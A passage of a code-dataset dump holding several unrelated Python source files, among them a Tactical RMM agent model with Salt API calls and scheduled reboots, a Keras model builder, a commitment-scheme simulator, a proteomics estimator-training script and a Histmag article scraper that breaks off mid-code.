physical_disks(self):\n try:\n disks = self.wmi_detail[\"disk\"]\n phys = []\n for disk in disks:\n model = [x[\"Caption\"] for x in disk if \"Caption\" in x][0]\n size = [x[\"Size\"] for x in disk if \"Size\" in x][0]\n interface_type = [\n x[\"InterfaceType\"] for x in disk if \"InterfaceType\" in x\n ][0]\n phys.append(\n {\n \"model\": model,\n \"size\": round(int(size) / 1_073_741_824), # bytes to GB\n \"interfaceType\": interface_type,\n }\n )\n\n return phys\n except:\n return [{\"model\": \"unknown\", \"size\": \"unknown\", \"interfaceType\": \"unknown\"}]\n\n def generate_checks_from_policies(self):\n # Clear agent checks managed by policy\n self.agentchecks.filter(managed_by_policy=True).delete()\n\n # Clear agent checks that have overriden_by_policy set\n self.agentchecks.update(overriden_by_policy=False)\n\n # Generate checks based on policies\n automation.models.Policy.generate_policy_checks(self)\n\n # https://github.com/Ylianst/MeshCentral/issues/59#issuecomment-521965347\n def get_login_token(self, key, user, action=3):\n key = bytes.fromhex(key)\n key1 = key[0:48]\n key2 = key[48:]\n msg = '{{\"a\":{}, \"u\":\"{}\",\"time\":{}}}'.format(action, user, int(time.time()))\n iv = secrets.token_bytes(16)\n\n # sha\n h = hashlib.sha3_384()\n h.update(key1)\n msg = h.digest() + msg.encode()\n\n # aes\n a = AES.new(key2, AES.MODE_CBC, iv)\n n = 16 - (len(msg) % 16)\n n = 16 if n == 0 else n\n pad = unhexlify(\"%02x\" % n)\n msg = a.encrypt(msg + pad * n)\n\n return base64.b64encode(iv + msg, altchars=b\"@$\").decode(\"utf-8\")\n\n @staticmethod\n def salt_api_cmd(**kwargs):\n try:\n salt_timeout = kwargs[\"salt_timeout\"]\n except KeyError:\n salt_timeout = 60\n json = {\n \"client\": \"local\",\n \"tgt\": kwargs[\"hostname\"],\n \"fun\": kwargs[\"func\"],\n \"timeout\": salt_timeout,\n \"username\": settings.SALT_USERNAME,\n \"password\": settings.SALT_PASSWORD,\n \"eauth\": \"pam\",\n }\n\n if \"arg\" in kwargs:\n json.update({\"arg\": kwargs[\"arg\"]})\n if \"kwargs\" in kwargs:\n json.update({\"kwarg\": kwargs[\"kwargs\"]})\n resp = requests.post(\n \"http://\" + settings.SALT_HOST + \":8123/run\",\n json=[json],\n timeout=kwargs[\"timeout\"],\n )\n return resp\n\n @staticmethod\n def salt_api_async(**kwargs):\n\n json = {\n \"client\": \"local_async\",\n \"tgt\": kwargs[\"hostname\"],\n \"fun\": kwargs[\"func\"],\n \"username\": settings.SALT_USERNAME,\n \"password\": settings.SALT_PASSWORD,\n \"eauth\": \"pam\",\n }\n\n if \"arg\" in kwargs:\n json.update({\"arg\": kwargs[\"arg\"]})\n if \"kwargs\" in kwargs:\n json.update({\"kwarg\": kwargs[\"kwargs\"]})\n resp = requests.post(\"http://\" + settings.SALT_HOST + \":8123/run\", json=[json])\n return resp\n\n @staticmethod\n def salt_api_job(jid):\n\n session = requests.Session()\n session.post(\n \"http://\" + settings.SALT_HOST + \":8123/login\",\n json={\n \"username\": settings.SALT_USERNAME,\n \"password\": settings.SALT_PASSWORD,\n \"eauth\": \"pam\",\n },\n )\n\n return session.get(f\"http://{settings.SALT_HOST}:8123/jobs/{jid}\")\n\n @staticmethod\n def get_github_versions():\n r = requests.get(\"https://api.github.com/repos/wh1te909/winagent/releases\")\n versions = {}\n for i, release in enumerate(r.json()):\n versions[i] = release[\"name\"]\n\n return {\"versions\": versions, \"data\": r.json()}\n\n def schedule_reboot(self, obj):\n\n start_date = dt.datetime.strftime(obj, \"%Y-%m-%d\")\n start_time = dt.datetime.strftime(obj, \"%H:%M\")\n\n # let windows task scheduler automatically delete the task after it runs\n end_obj = obj + dt.timedelta(minutes=15)\n end_date = dt.datetime.strftime(end_obj, \"%Y-%m-%d\")\n end_time = dt.datetime.strftime(end_obj, \"%H:%M\")\n\n task_name = \"TacticalRMM_SchedReboot_\" + \"\".join(\n random.choice(string.ascii_letters) for _ in range(10)\n )\n\n try:\n r = self.salt_api_cmd(\n hostname=self.salt_id,\n timeout=20,\n func=\"task.create_task\",\n arg=[\n f\"name={task_name}\",\n \"force=True\",\n \"action_type=Execute\",\n 'cmd=\"C:\\\\Windows\\\\System32\\\\shutdown.exe\"',\n 'arguments=\"/r /t 5 /f\"',\n \"trigger_type=Once\",\n f'start_date=\"{start_date}\"',\n f'start_time=\"{start_time}\"',\n f'end_date=\"{end_date}\"',\n f'end_time=\"{end_time}\"',\n \"ac_only=False\",\n \"stop_if_on_batteries=False\",\n \"delete_after=Immediately\",\n ],\n )\n except Exception:\n return {\"ret\": False, \"msg\": \"Unable to contact the agent\"}\n\n salt_resp = r.json()[\"return\"][0][self.salt_id]\n\n if isinstance(salt_resp, bool) and salt_resp == True:\n from logs.models import PendingAction\n\n details = {\n \"taskname\": task_name,\n \"time\": str(obj),\n }\n PendingAction(agent=self, action_type=\"schedreboot\", details=details).save()\n\n nice_time = dt.datetime.strftime(obj, \"%B %d, %Y at %I:%M %p\")\n return {\n \"ret\": True,\n \"msg\": {\"time\": nice_time, \"agent\": self.hostname},\n \"success\": True,\n }\n\n elif isinstance(salt_resp, bool) and salt_resp == False:\n return {\n \"ret\": True,\n \"msg\": \"Unable to create task (possibly because date/time cannot be in the past)\",\n \"success\": False,\n }\n\n else:\n return {\"ret\": True, \"msg\": salt_resp, \"success\": False}\n\n\nclass AgentOutage(models.Model):\n agent = models.ForeignKey(\n Agent,\n related_name=\"agentoutages\",\n null=True,\n blank=True,\n on_delete=models.CASCADE,\n )\n outage_time = models.DateTimeField(auto_now_add=True)\n recovery_time = models.DateTimeField(null=True, blank=True)\n outage_email_sent = models.BooleanField(default=False)\n outage_sms_sent = models.BooleanField(default=False)\n recovery_email_sent = models.BooleanField(default=False)\n recovery_sms_sent = models.BooleanField(default=False)\n\n @property\n def is_active(self):\n return False if self.recovery_time else True\n\n def send_outage_email(self):\n from core.models import CoreSettings\n\n CORE = CoreSettings.objects.first()\n CORE.send_mail(\n f\"{self.agent.client}, {self.agent.site}, {self.agent.hostname} - data overdue\",\n (\n f\"Data has not been received from client {self.agent.client}, \"\n f\"site {self.agent.site}, \"\n f\"agent {self.agent.hostname} \"\n \"within the expected time.\"\n ),\n )\n\n def send_recovery_email(self):\n from core.models import CoreSettings\n\n CORE = CoreSettings.objects.first()\n CORE.send_mail(\n f\"{self.agent.client}, {self.agent.site}, {self.agent.hostname} - data received\",\n (\n f\"Data has been received from client {self.agent.client}, \"\n f\"site {self.agent.site}, \"\n f\"agent {self.agent.hostname} \"\n \"after an interruption in data transmission.\"\n ),\n )\n\n def __str__(self):\n return self.agent.hostname\n","sub_path":"api/tacticalrmm/agents/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":13706,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"264996866","text":"from yaml_creator.models.ModelDescriptor import ModelDescriptor,default_model_descriptor_folder_name\nfrom django.shortcuts import render\nfrom ..helpers import dataDirPath\n\ndef data_base_index(request):\n # at the moment we do not use the database\n # folder_names=[md.filename for\n # ModelDescriptor.objects.order_by('-pub_date')]\n # but scan the datadirectory\n \n folder_names = [str(p.stem) for p in\n dataDirPath.iterdir()] if dataDirPath.exists() else []\n\n context={\n 'folder_names':folder_names,\n 'default_folder_name':default_model_descriptor_folder_name()}\n print('######################')\n print(context)\n print('######################')\n \n return render(request,'yaml_creator/data_base_index.html',context)\n","sub_path":"mysite/yaml_creator/views/data_base_index.py","file_name":"data_base_index.py","file_ext":"py","file_size_in_byte":783,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"652845543","text":"\n#keras imports\nfrom keras.models import model_from_json\nfrom keras.models import Sequential\nfrom keras.layers.core import Dense, Dropout, Activation, Flatten\nfrom keras.layers.convolutional import Conv2D, MaxPooling2D\nfrom keras.optimizers import SGD , Adam\n\nfrom Config import *\nimport os\n\n\ndef buildmodel():\n print(\"Now we build the model\")\n model = Sequential()\n model.add(Conv2D(32, (8, 8), padding='same',strides=(4, 4),input_shape=(img_cols,img_rows,img_channels))) #80*80*4\n model.add(MaxPooling2D(pool_size=(2,2)))\n model.add(Activation('relu'))\n model.add(Conv2D(64, (4, 4),strides=(2, 2), padding='same'))\n model.add(MaxPooling2D(pool_size=(2,2)))\n model.add(Activation('relu'))\n model.add(Conv2D(128, (3, 3),strides=(1, 1), padding='same'))\n model.add(MaxPooling2D(pool_size=(2,2)))\n model.add(Activation('relu'))\n model.add(Flatten())\n model.add(Dense(512))\n model.add(Activation('relu'))\n model.add(Dense(384))\n model.add(Activation('relu'))\n model.add(Dense(64))\n model.add(Activation('relu'))\n model.add(Dense(ACTIONS))\n adam = Adam(lr=LEARNING_RATE)\n model.compile(loss='mse',optimizer=adam)\n \n #create model file if not present\n if not os.path.isfile(loss_file_path):\n model.save_weights('model.h5')\n print(\"We finish building the model\")\n return model","sub_path":"Model.py","file_name":"Model.py","file_ext":"py","file_size_in_byte":1358,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"5609423","text":"import json \nimport os \nimport sys, getopt\nfrom datetime import datetime \nfrom feeder import *\n\nconfig = {\"input\":\"omd\",\"output\":\"glm\",\"type\":[]}\n\ndef help():\n print('Syntax:')\n print('omd2glm.py -i|--ifile [,[,...]] -o|--ofile ')\n print(' -c|--config : [OPTIONAL] output converter configuration')\n print(' -i|--ifile : [REQUIRED] omd input file name.')\n print(' -o|--ofile : [REQUIRED] glm output file name.')\n\ninput_file = None\noutput_file = None\noutput_type = None\n\nopts, args = getopt.getopt(sys.argv[1:],\"hci:o:\",[\"help\",\"config\",\"ifile=\",\"ofile=\"])\n\nif not opts : \n help()\n sys.exit(1)\nfor opt, arg in opts:\n if opt in (\"-h\",\"--help\"):\n help()\n sys.exit(0)\n elif opt in (\"-c\",\"--config\"):\n print(json.dumps(config))\n sys.exit(0)\n elif opt in (\"-i\", \"--ifile\"):\n input_file = arg.strip()\n elif opt in (\"-o\", \"--ofile\"):\n output_file = arg.strip()\n else:\n raise Exception(f\"'{opt}' is an invalid command line option\")\n\nomdToGlm(input_file,output_file)","sub_path":"converters/omd2glm.py","file_name":"omd2glm.py","file_ext":"py","file_size_in_byte":1091,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"321290461","text":"from itm import ITM\n\nclass Sim_Com(ITM):\n def __init__(self, k, bits, crupt, sid, pid, channels, pump, poly, importargs):\n self.crupt = crupt\n self.ssid = sid[0]\n self.committer = sid[1]\n self.receiver = sid[2]\n self.table = {}\n self.revtable = {}\n\n self.receiver_random = None\n self.receiver_state = 1\n\n handlers = {\n channels['p2a'] : self.party_msg,\n channels['f2a'] : self.func_msg,\n channels['z2a'] : self.env_msg,\n }\n\n ITM.__init__(self, k, bits, sid, pid, channels, handlers, poly, pump, importargs)\n\n def is_dishonest(self, sid, pid):\n return (sid,pid) in self.crupt\n\n def is_honest(self, sid, pid):\n return not self.is_dishonest(sid,pid)\n\n def hash(self, s):\n if k not in self.table:\n self.table[s] = self.sample(self.k)\n self.revtable[self.table[s]] = s\n return self.table[s]\n\n def env_msg(self, m):\n msg = m.msg\n imp = m.imp\n if msg[0] == 'A2F':\n t,msg,iprime = msg\n if msg[0] == 'ro':\n self.write('a2f', ('ro', self.hash(msg[1])))\n else:\n self.pump.write('')\n #elif isdishonest(self.sid, self.committer):\n elif self.is_dishonest(self.sid, self.committer):\n if msg[0] == 'A2P':\n _,to,msg = msg\n assert to == (self.sid, self.committer)\n if msg[0] == 'commit':\n # env gives some hash value\n if msg[1] in self.revtable:\n self.write('a2p', (to, ('commit', self.revtable[msg[1]])))\n else:\n b = self.sample(1)\n self.write('a2p', (to, ('commit', b)))\n else: \n self.pump.write('')\n else:\n self.pump.write('')\n\n def party_msg(self, m):\n msg = m.msg\n imp = m.imp\n fro,msg = msg\n print('adv party message', m)\n if self.is_dishonest(self.sid, self.receiver) and fro == (self.sid, self.receiver):\n if msg == 'commit' and self.receiver_state == 1:\n self.receiver_random = self.sample(self.k)\n #self.write('a2z', ('P2A', (fro, ((self.sid, 'F_ro'),('send', self.receiver_random)))))\n self.write('a2z', ('P2A', (fro, ('send', self.receiver_random))))\n self.receiver_state = 2\n elif msg[0] == 'open' and self.receiver_state == 2 :\n bit = msg[1]\n #self.write('a2z', ('P2A', (fro, ((self.sid,'F_ro'),('send', (self.sample(self.k), bit))))))\n self.write('a2z', ('P2A', (fro, ('send', (self.sample(self.k), bit)))))\n self.receiver_state = 3\n else:\n self.pump.write('')\n else:\n self.pump.write('')\n\n def func_msg(self, m):\n self.pump.write('')\n","sub_path":"apps/commitment/sim_com.py","file_name":"sim_com.py","file_ext":"py","file_size_in_byte":2973,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"357651979","text":"import pandas as pd\nimport numpy as np\nimport sys\nimport pickle\nimport os\nimport shutil\nimport time\nimport argparse\nimport peakutils\nfrom sklearn.ensemble import GradientBoostingRegressor\nfrom sklearn.model_selection import RandomizedSearchCV\nfrom sklearn.model_selection import train_test_split\nimport configparser\nfrom configparser import ExtendedInterpolation\n\n\ndef generate_estimator(X_train, X_test, y_train, y_test):\n if args.search_for_new_model_parameters:\n # do a randomised search to find the best regressor dimensions\n print('setting up randomised search')\n parameter_search_space = {\n \"loss\": ['ls','lad','huber'],\n \"learning_rate\": [0.01, 0.05, 0.1, 0.2],\n 'n_estimators': range(20,510,10),\n 'max_depth':range(5,30,2), \n 'min_samples_split':range(100,1001,100),\n 'subsample':list(np.arange(0.2,0.9,0.1)),\n 'min_samples_leaf':range(10,71,10),\n 'max_features':[\"log2\", \"sqrt\"],\n }\n # cross-validation splitting strategy uses 'cv' folds in a (Stratified)KFold\n rsearch = RandomizedSearchCV(GradientBoostingRegressor(), parameter_search_space, n_iter=100, n_jobs=-1, random_state=10, cv=5, scoring='r2', verbose=1) # All scorer objects follow the convention that higher return values are better than lower return values, so we want the negated version for error metrics\n print('fitting to the training set')\n # find the best fit within the parameter search space\n rsearch.fit(X_train, y_train)\n best_estimator = rsearch.best_estimator_\n print('best score from the search: {}'.format(round(rsearch.best_score_, 4)))\n best_params = rsearch.best_params_\n print(best_params)\n else:\n print('fitting the estimator to the training data')\n # use the model parameters we found previously\n best_params = {'subsample': 0.6, 'n_estimators': 280, 'min_samples_split': 400, 'min_samples_leaf': 10, 'max_features': 'log2', 'max_depth': 11, 'loss': 'lad', 'learning_rate': 0.05}\n best_estimator = GradientBoostingRegressor(**best_params)\n best_estimator.fit(X_train, y_train) # find the best fit within the parameter search space\n\n # calculate the estimator's score on the train and test sets\n print('evaluating against the training and test set')\n y_train_pred = best_estimator.predict(X_train)\n y_test_pred = best_estimator.predict(X_test)\n print(\"mean absolute error for training set: {}, test set: {}\".format(round(np.abs(y_train-y_train_pred).mean(),4), round(np.abs(y_test-y_test_pred).mean(),4)))\n return best_estimator\n\n\n####################################################################\n\n# This program uses the sequence library to build estimation models to estimate where in each run the library sequence should be.\n\nparser = argparse.ArgumentParser(description='Using the library sequences, build run-specific coordinate estimators for the sequence-charges identified in the experiment.')\nparser.add_argument('-eb','--experiment_base_dir', type=str, default='./experiments', help='Path to the experiments directory.', required=False)\nparser.add_argument('-en','--experiment_name', type=str, help='Name of the experiment.', required=True)\nparser.add_argument('-ini','--ini_file', type=str, default='./tfde/pipeline/pasef-process-short-gradient.ini', help='Path to the config file.', required=False)\nparser.add_argument('-snmp','--search_for_new_model_parameters', action='store_true', help='Search for new model parameters.')\nparser.add_argument('-pdm','--precursor_definition_method', type=str, choices=['pasef','3did','mq'], default='pasef', help='The method used to define the precursor cuboids.', required=False)\nargs = parser.parse_args()\n\n# Print the arguments for the log\ninfo = []\nfor arg in vars(args):\n info.append((arg, getattr(args, arg)))\nprint(info)\n\n# check the experiment directory exists\nEXPERIMENT_DIR = \"{}/{}\".format(args.experiment_base_dir, args.experiment_name)\nif not os.path.exists(EXPERIMENT_DIR):\n print(\"The experiment directory is required but doesn't exist: {}\".format(EXPERIMENT_DIR))\n sys.exit(1)\n\n# load the sequence library\nSEQUENCE_LIBRARY_DIR = \"{}/sequence-library-{}\".format(EXPERIMENT_DIR, args.precursor_definition_method)\nSEQUENCE_LIBRARY_FILE_NAME = \"{}/sequence-library.feather\".format(SEQUENCE_LIBRARY_DIR)\nif not os.path.isfile(SEQUENCE_LIBRARY_FILE_NAME):\n print(\"The sequences library file doesn't exist: {}\".format(SEQUENCE_LIBRARY_FILE_NAME))\n sys.exit(1)\n\n# load the sequence library\nlibrary_sequences_df = pd.read_feather(SEQUENCE_LIBRARY_FILE_NAME)\nprint('loaded {} sequences from the library {}'.format(len(library_sequences_df), SEQUENCE_LIBRARY_FILE_NAME))\n\n# load the indentifications from each run\nIDENTIFICATIONS_DIR = '{}/identifications-pasef'.format(EXPERIMENT_DIR)\nIDENTIFICATIONS_FILE = '{}/exp-{}-identifications-pasef-recalibrated.feather'.format(IDENTIFICATIONS_DIR, args.experiment_name)\nif not os.path.isfile(IDENTIFICATIONS_FILE):\n print(\"The identifications file doesn't exist: {}\".format(IDENTIFICATIONS_FILE))\n sys.exit(1)\n\n# load the experiment identifications\nidentifications_df = pd.read_feather(IDENTIFICATIONS_FILE)\nprint('loaded {} identifications from {}'.format(len(identifications_df), IDENTIFICATIONS_FILE))\nidentifications_df['human'] = identifications_df['protein id'].str.contains('HUMAN')\n\n# set up the coordinate estimators directory\nCOORDINATE_ESTIMATORS_DIR = \"{}/coordinate-estimators\".format(EXPERIMENT_DIR)\nif os.path.exists(COORDINATE_ESTIMATORS_DIR):\n shutil.rmtree(COORDINATE_ESTIMATORS_DIR)\nos.makedirs(COORDINATE_ESTIMATORS_DIR)\nprint(\"The coordinate estimators directory was created: {}\".format(COORDINATE_ESTIMATORS_DIR))\n\n# outputs\nRUN_SEQUENCES_FILE_NAME = \"{}/run-sequence-attribs.feather\".format(COORDINATE_ESTIMATORS_DIR)\nMERGED_RUN_LIBRARY_SEQUENCES_FILE_NAME = \"{}/merged-run-library-sequence-attribs.feather\".format(COORDINATE_ESTIMATORS_DIR)\n\n# check the INI file exists\nif not os.path.isfile(args.ini_file):\n print(\"The configuration file doesn't exist: {}\".format(args.ini_file))\n sys.exit(1)\n\n# load the INI file\ncfg = configparser.ConfigParser(interpolation=ExtendedInterpolation())\ncfg.read(args.ini_file)\n\n# set up constants\nMINIMUM_PROPORTION_OF_IDENTS_FOR_COORD_ESTIMATOR_TRAINING = cfg.getfloat('extraction','MINIMUM_PROPORTION_OF_IDENTS_FOR_COORD_ESTIMATOR_TRAINING')\n\nstart_run = time.time()\n\n# for each run, find the mz, scan, RT, and intensity for each sequence-charge identified\nrun_sequences_l = []\nfor group_name,group_df in identifications_df.groupby(['run_name','sequence','charge'], as_index=False):\n run_name = group_name[0]\n sequence = group_name[1]\n charge = group_name[2]\n run_mz_mean = peakutils.centroid(group_df.recalibrated_monoisotopic_mz, group_df.feature_intensity)\n run_mz_std_dev = np.std(group_df.recalibrated_monoisotopic_mz)\n run_scan_mean = np.mean(group_df.scan_apex)\n run_scan_std_dev = np.std(group_df.scan_apex)\n run_rt_mean = np.mean(group_df.rt_apex)\n run_rt_std_dev = np.std(group_df.rt_apex)\n run_intensity_mean = np.mean(group_df.feature_intensity)\n run_intensity_std_dev = np.std(group_df.feature_intensity)\n run_sequences_l.append((run_name,sequence,charge,run_mz_mean,run_scan_mean,run_rt_mean,run_mz_std_dev,run_scan_std_dev,run_rt_std_dev,run_intensity_mean,run_intensity_std_dev))\n\nrun_sequences_df = pd.DataFrame(run_sequences_l, columns=['run_name','sequence','charge','run_mz','run_scan','run_rt','run_mz_std_dev','run_scan_std_dev','run_rt_std_dev','run_intensity','run_intensity_std_dev'])\n\n# calculate the coefficients of variance\nrun_sequences_df['cv_mz'] = run_sequences_df.run_mz_std_dev / run_sequences_df.run_mz\nrun_sequences_df['cv_scan'] = run_sequences_df.run_scan_std_dev / run_sequences_df.run_scan\nrun_sequences_df['cv_rt'] = run_sequences_df.run_rt_std_dev / run_sequences_df.run_rt\nrun_sequences_df['cv_intensity'] = run_sequences_df.run_intensity_std_dev / run_sequences_df.run_intensity\n\nrun_sequences_df.to_feather(RUN_SEQUENCES_FILE_NAME)\n\n# merge the sequence-charges for each run with their library counterparts\nmerged_df = pd.merge(run_sequences_df, library_sequences_df, how='left', left_on=['sequence','charge'], right_on=['sequence','charge'])\n\n# for each run-sequence-charge, calculate the delta from the library\nmerged_df['delta_mz'] = merged_df.run_mz - merged_df.theoretical_mz\nmerged_df['delta_mz_ppm'] = (merged_df.run_mz - merged_df.theoretical_mz) / merged_df.theoretical_mz * 1e6\nmerged_df['delta_scan'] = (merged_df.run_scan - merged_df.experiment_scan_mean) / merged_df.experiment_scan_mean\nmerged_df['delta_rt'] = (merged_df.run_rt - merged_df.experiment_rt_mean) / merged_df.experiment_rt_mean\n\nmerged_df.drop(['run_mz_std_dev','run_scan_std_dev','run_rt_std_dev','run_intensity_std_dev'], axis=1, inplace=True)\nprint(\"writing {} merged run-library sequence attributes to {}\".format(len(merged_df), MERGED_RUN_LIBRARY_SEQUENCES_FILE_NAME))\nmerged_df.to_feather(MERGED_RUN_LIBRARY_SEQUENCES_FILE_NAME)\n\n# create an estimator for each run in the experiment\nrun_names_l = list(identifications_df.run_name.unique())\nfor run_name in run_names_l:\n print(\"building the coordinate estimators for run {}\".format(run_name))\n estimator_training_set_df = merged_df[(merged_df.run_name == run_name) & (merged_df.number_of_runs_identified > round(len(run_names_l) * MINIMUM_PROPORTION_OF_IDENTS_FOR_COORD_ESTIMATOR_TRAINING))]\n\n # X is the same for all the estimators\n # filter out rows not to be used in this training set\n X = estimator_training_set_df[['theoretical_mz','experiment_rt_mean','experiment_rt_std_dev','experiment_scan_mean','experiment_scan_std_dev','experiment_intensity_mean','experiment_intensity_std_dev']].values\n y = estimator_training_set_df[['delta_mz_ppm','delta_scan','delta_rt','run_mz','run_scan','run_rt']].values\n X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.02)\n print('there are {} examples in the training set, {} in the test set'.format(len(X_train), len(X_test)))\n\n # save the test set so we can evaluate performance\n np.save('{}/run-{}-X_test.npy'.format(COORDINATE_ESTIMATORS_DIR, run_name), X_test)\n np.save('{}/run-{}-y_test.npy'.format(COORDINATE_ESTIMATORS_DIR, run_name), y_test)\n\n # build the m/z delta estimation model - estimate the m/z delta ppm as a proportion of the experiment-wide value\n print('training the m/z model')\n mz_estimator = generate_estimator(X_train, X_test, y_train[:,0], y_test[:,0])\n\n # save the trained m/z model\n ESTIMATOR_MODEL_FILE_NAME = \"{}/run-{}-{}-estimator.pkl\".format(COORDINATE_ESTIMATORS_DIR, run_name, 'mz')\n with open(ESTIMATOR_MODEL_FILE_NAME, 'wb') as file:\n pickle.dump(mz_estimator, file)\n\n # build the scan estimation model - estimate the delta scan as a proportion of the experiment-wide value\n print('training the scan model')\n scan_estimator = generate_estimator(X_train, X_test, y_train[:,1], y_test[:,1])\n\n # save the trained scan model\n ESTIMATOR_MODEL_FILE_NAME = \"{}/run-{}-{}-estimator.pkl\".format(COORDINATE_ESTIMATORS_DIR, run_name, 'scan')\n with open(ESTIMATOR_MODEL_FILE_NAME, 'wb') as file:\n pickle.dump(scan_estimator, file)\n\n # RT estimation model - estimate the RT delta as a proportion of the experiment-wide value\n print('training the RT model')\n rt_estimator = generate_estimator(X_train, X_test, y_train[:,2], y_test[:,2])\n\n # save the trained RT model\n ESTIMATOR_MODEL_FILE_NAME = \"{}/run-{}-{}-estimator.pkl\".format(COORDINATE_ESTIMATORS_DIR, run_name, 'rt')\n with open(ESTIMATOR_MODEL_FILE_NAME, 'wb') as file:\n pickle.dump(rt_estimator, file)\n \n print()\n\nstop_run = time.time()\nprint(\"total running time ({}): {} seconds\".format(parser.prog, round(stop_run-start_run,1)))\n","sub_path":"pipeline/build-run-coordinate-estimators.py","file_name":"build-run-coordinate-estimators.py","file_ext":"py","file_size_in_byte":11925,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"314927967","text":"import json\nfrom gtts import gTTS\n\n\ndef converter():\n with open(\"files/news_data.csv\", \"r\") as file:\n news_data = file.read()\n\n news_data = json.loads(news_data)\n text = \"\"\n\n for i, j in news_data.items():\n text += \"Next Next Next \" + str(i)\n\n speech = gTTS(text=text, lang=\"en\", slow=False)\n with open('files/test.mp3', 'wb') as f:\n speech.write_to_fp(f)\n print(\"Audio created successfully\")\n\n","sub_path":"helpers/text_audio_converter.py","file_name":"text_audio_converter.py","file_ext":"py","file_size_in_byte":436,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"222367844","text":"from dexy.doc import Doc\nfrom dexy.params import RunParams\nfrom dexy.runner import Runner\nfrom dexy.tests.utils import tempdir\nfrom ordereddict import OrderedDict\nimport os\n\ndef test_runner_init():\n runner = Runner()\n assert isinstance(runner.params, RunParams)\n assert isinstance(runner.registered, list)\n assert runner.params.artifacts_dir == 'artifacts'\n\ndef test_runner_setup():\n with tempdir():\n assert not os.path.exists('artifacts')\n runner = Runner()\n runner.setup_dexy_dirs()\n assert os.path.exists('artifacts')\n\ndef test_runner_run():\n with tempdir():\n runner = Runner()\n runner.setup_dexy_dirs()\n d1 = Doc(\"abc.txt|outputabc\", contents=\"these are the contents\", runner=runner)\n d2 = Doc(\"hello.txt|outputabc\", contents=\"these are more contents\", runner=runner)\n assert d1.state == 'setup'\n assert d2.state == 'setup'\n runner.docs = [d1, d2]\n runner.run()\n assert d1.state == 'complete'\n assert d2.state == 'complete'\n\ndef test_runner_register():\n with tempdir():\n doc = Doc(\"abc.txt\")\n runner = Runner()\n runner.setup_dexy_dirs()\n runner.register(doc)\n assert doc in runner.registered\n","sub_path":"dexy/tests/test_runner.py","file_name":"test_runner.py","file_ext":"py","file_size_in_byte":1250,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"321810022","text":"#!/usr/bin/env python\n# -*- coding: UTF-8 -*-\n# python 3.6.4\n\n#import pygame\n#import OpenGL\n#import kivy\nimport sys\nimport menus\n\n#random.seed(1)\n\ndef sortWordsByLength(allWords):\n\twordsLenDict = {}\n\tfor word in allWords:\n\t\ttry:\n\t\t\twordsLenDict[len(word)].append(word)\n\t\texcept KeyError:\n\t\t\twordsLenDict[len(word)] = [word]\n\twith open('wordsLen.ini','w') as file:\n\t\tjson.dump(wordsLenDict,file)\n\treturn\n\nmenus.mainMenu()\n\nsys.exit()","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":432,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"624169976","text":"# -*- coding: utf-8 -*-\nimport re\n\nfrom mobify.source import MultiPageSource, MobifySource\n\n\nclass HistmagSource(MultiPageSource):\n @staticmethod\n def is_my_url(url):\n return '//histmag.org/' in url\n\n @staticmethod\n def extend_url(url):\n url = url.split('?')[0]\n return url\n\n def get_pages(self):\n url = self.extend_url(self._url)\n\n # https://histmag.org/Maurycy-Beniowski-bunt-na-Kamczatce-13947/3\n try:\n last_page_link = self.tree.xpath('//div[@class=\"paginator\"][1]//a')[-1].attrib.get('href')\n last_page_no = int(last_page_link.split('/')[-1]) # 3\n except IndexError:\n last_page_no = 1\n\n pages = ['{}/{}'.format(url, page) for page in range(1, last_page_no+1)]\n\n self._logger.info('Chapters: {}'.format(pages))\n\n return [HistmagPage(url=page) for page in pages]\n\n\nclass HistmagPage(MobifySource):\n\n HEADER = u\"\"\"\n

{title}

\n

{lead}

\n

{author}

\n\"\"\"\n\n FOOTER = u\"\"\"\n

\n
\n

Wolna licencja – ten materiał został opublikowany na licencji Creative Commons Uznanie autorstwa\nNa tych samych warunkach 3.0 Polska.

\n\n

Redakcja i autor zezwalają na jego dowolny przedruk i wykorzystanie (również w celach komercyjnych) pod\nnastępującymi warunkami: należy wyraźnie wskazać autora materiału oraz miejsce pierwotnej publikacji –\nPortal historyczny Histmag.org, a także nazwę licencji (CC BY-SA 3.0) wraz z odnośnikiem do jej postanowień.\nW przypadku przedruku w internecie konieczne jest także zamieszczenie dokładnego aktywnego\nodnośnika do materiału objętego licencją.

\n\n

Źródło: {url}

\n \"\"\"\n\n @staticmethod\n def is_my_url(url):\n \"\"\"\n This source cannot be created directly from Publisher\n \"\"\"\n raise NotImplementedError\n\n def get_inner_html(self):\n article = self.xpath('//*[@class=\"middle\"]')\n\n # clean up the HTML\n xpaths = [\n 'table',\n 'div[@class=\"paginator\"]',\n 'h4', # Zobacz także\n '*//span/a[img]', # big pictures\n '*//span/img', # inline pictures\n 'img',\n 'div[@class=\"snippet\"]', # reklamy\n 'h3[contains(text(), \"Tekst jest fragmentem\")]', # fragmenty książek\n ]\n article = self.remove_nodes(article, xpaths)\n\n html = self.get_node_html(article)\n\n # tags cleanup\n html = re.sub(r'

', '', html)\n html = re.sub(r'

\\s*

', '', html)\n html = re.sub(r']*>', '', html)\n\n return html\n\n def get_html(self):\n # add a title and a footer\n return '\\n'.join([\n self.HEADER.format(title=self.get_title(), author=self.get_author(), lead=self.get_lead()).strip(),\n self.get_inner_html(),\n self.FOOTER.format(url=self._url).strip()\n ]).strip()\n\n def get_title(self):\n #

Maurycy Beniowski - bunt na Kamczatce

\n return self.get_node('//div[contains(@class, \"article_panel\")]//p[1]').strip()\n\n def get_lead(self):\n #

Po upadku konfederacji ...

